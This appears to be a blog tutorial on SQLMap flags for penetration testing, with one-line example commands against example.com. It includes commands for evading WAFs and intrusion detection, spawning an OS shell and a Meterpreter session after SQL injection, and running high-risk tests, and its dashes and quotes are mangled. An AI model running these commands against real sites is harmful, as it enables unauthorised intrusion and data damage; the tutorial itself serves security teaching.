Mastering SQLMap: Advanced Commands for Ethical Hacking

SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws. As a powerful and versatile tool, it’s a must-have for ethical hackers and cybersecurity professionals. In this article, we’ll delve into 20 lesser-known SQLMap commands that can elevate your skills and help you perform advanced penetration testing on various web applications.

Before we begin, it’s crucial to note that this article is for educational purposes only. Make sure you have explicit permission from the website owners before running any penetration tests.

Getting Started with SQLMap
First, ensure you have SQLMap installed on your system. If you haven’t, you can download it from the official GitHub repository and follow the installation instructions.

With SQLMap installed, let’s dive into the advanced commands:

— batch: This flag enables batch mode, which answers all questions with the default answer. This is useful for automating tests and reducing user input.

sqlmap -u “http://example.com/page.php?id=1" — batch
```

— delay: To avoid triggering security mechanisms like intrusion detection systems, use the — delay option to set a delay between requests in seconds.

sqlmap -u “http://example.com/page.php?id=1" — delay 2
```

— timeout: Control the timeout for individual requests using the — timeout flag. This can prevent long waits during scanning.

sqlmap -u “http://example.com/page.php?id=1" — timeout 10
```

— retries: Configure the number of retries in case of network errors or timeouts using the — retries flag.

sqlmap -u “http://example.com/page.php?id=1" — retries 3
```

— tamper: Use tamper scripts to evade web application firewalls (WAFs) and other security mechanisms. Multiple tamper scripts can be specified using commas.

sqlmap -u “http://example.com/page.php?id=1" — tamper “between,randomcase”
```

— os-shell: Gain access to the underlying operating system shell after successfully achieving SQL injection.

sqlmap -u “http://example.com/page.php?id=1" — os-shell
```

— os-pwn: After a successful SQL injection, use this command to exploit the operating system and create a Meterpreter session.

sqlmap -u “http://example.com/page.php?id=1" — os-pwn
```

— risk: Set the risk level of tests (1–3). Higher levels might cause database damage or other issues. Always use a low risk level unless you have explicit permission.

sqlmap -u “http://example.com/page.php?id=1" — risk=3
```

— level: Adjust the intrusiveness level (1–5) for SQLMap to test more injection points.

sqlmap -u “http://example.com/page.php?id=1" — level=5
```

— technique: Select specific SQL injection techniques to use (B: Boolean-based blind, T: Time-based blind, E: Error-based, U: Union query, S: Stacked queries).

sqlmap -u “http://example.com/page.php?id=1" — technique U
— dbms: Specify the target database management system to speed up the testing process.

sqlmap -u “http://example.com/page.php?id=1" — dbms mysql
— user-agent: Change the User-Agent header to mimic different browsers or avoid detection.

sqlmap -u “http://example.com/page.php?id=1" — user-agent “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299”
— threads: Speed up the testing process by running multiple threads.

sqlmap -u “http://example.com/page.php?id=1" — threads 10
— proxy: Use a proxy server to perform stealthier scans or bypass IP-based restrictions.

sqlmap -u “http://example.com/page.php?id=1" — proxy “http://127.0.0.1:8080"